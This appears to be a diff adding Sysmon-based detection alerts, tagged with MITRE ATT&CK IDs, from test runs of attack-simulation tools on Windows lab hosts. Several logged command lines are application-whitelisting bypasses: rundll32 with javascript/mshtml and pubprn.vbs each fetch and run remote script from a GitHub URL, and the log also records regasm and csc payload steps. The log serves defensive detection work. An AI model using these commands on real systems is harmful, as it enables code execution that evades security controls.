+
+ 2019-07-29 21:34:10.619
+ 747F3D96-6652-5D3F-0000-001058828C00
+ 348
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-6652-5D3F-0000-0010B9708C00
+ 5844
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4971
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:10.619
+ 747F3D96-6652-5D3F-0000-001058828C00
+ 348
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-6652-5D3F-0000-0010B9708C00
+ 5844
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4971
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:10.619
+ 747F3D96-6652-5D3F-0000-001058828C00
+ 348
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-6652-5D3F-0000-0010B9708C00
+ 5844
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4969
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:10.292
+ 747F3D96-6652-5D3F-0000-0010B9708C00
+ 5844
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4968
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:05.526
+ 747F3D96-664D-5D3F-0000-0010BB5D8C00
+ 5572
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 AllTheThings.dll,EntryPoint
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-664D-5D3F-0000-00108D5B8C00
+ 912
+ C:\Windows\System32\rundll32.exe
+ rundll32 AllTheThings.dll,EntryPoint
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4968
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:05.526
+ 747F3D96-664D-5D3F-0000-0010BB5D8C00
+ 5572
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 AllTheThings.dll,EntryPoint
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-664D-5D3F-0000-00108D5B8C00
+ 912
+ C:\Windows\System32\rundll32.exe
+ rundll32 AllTheThings.dll,EntryPoint
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4968
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:05.526
+ 747F3D96-664D-5D3F-0000-0010BB5D8C00
+ 5572
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 AllTheThings.dll,EntryPoint
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-664D-5D3F-0000-00108D5B8C00
+ 912
+ C:\Windows\System32\rundll32.exe
+ rundll32 AllTheThings.dll,EntryPoint
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4967
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:05.475
+ 747F3D96-664D-5D3F-0000-00108D5B8C00
+ 912
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 AllTheThings.dll,EntryPoint
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-664D-5D3F-0000-0010F1498C00
+ 6836
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32 AllTheThings.dll,EntryPoint
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966449
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:52:47.054
+ 365ABB72-569F-5C91-0000-001012610800
+ 2548
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4967
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:05.475
+ 747F3D96-664D-5D3F-0000-00108D5B8C00
+ 912
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 AllTheThings.dll,EntryPoint
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-664D-5D3F-0000-0010F1498C00
+ 6836
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32 AllTheThings.dll,EntryPoint
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4967
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:05.475
+ 747F3D96-664D-5D3F-0000-00108D5B8C00
+ 912
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 AllTheThings.dll,EntryPoint
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-664D-5D3F-0000-0010F1498C00
+ 6836
+ C:\Windows\System32\cmd.exe
+ cmd /c rundll32 AllTheThings.dll,EntryPoint
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966444
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:52:26.194
+ 365ABB72-568A-5C91-0000-0010D24B0800
+ 4072
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5006
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:45.524
+ 747F3D96-6675-5D3F-0000-0010875C8F00
+ 4036
+ C:\Windows\System32\cscript.exe
+ 5.812.10240.16384
+ Microsoft ® Console Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
+ 747F3D96-6675-5D3F-0000-0010AA498F00
+ 4184
+ C:\Windows\System32\cmd.exe
+ cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "del T1121.dll" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3615
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:56.002
+ 747F3D96-D7A4-5D31-0000-0010C9C22900
+ 6804
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "del T1121.dll"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3613
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:55.672
+ 747F3D96-D7A3-5D31-0000-001081B22900
+ 5800
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966429
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:52:25.853
+ 365ABB72-5689-5C91-0000-0010543F0800
+ 3896
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3611
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:55.057
+ 747F3D96-D7A3-5D31-0000-0010F2A42900
+ 4784
+ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
+ 4.7.3190.0 built by: NET472REL1LAST_C
+ Visual C# Command Line Compiler
+ Microsoft® .NET Framework
+ Microsoft Corporation
+ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D
+ 747F3D96-D7A3-5D31-0000-0010A0A22900
+ 6748
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ) contain suspicious command ( \csc.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3610
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:55.023
+ 747F3D96-D7A3-5D31-0000-0010A0A22900
+ 6748
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3610
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:55.023
+ 747F3D96-D7A3-5D31-0000-0010A0A22900
+ 6748
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
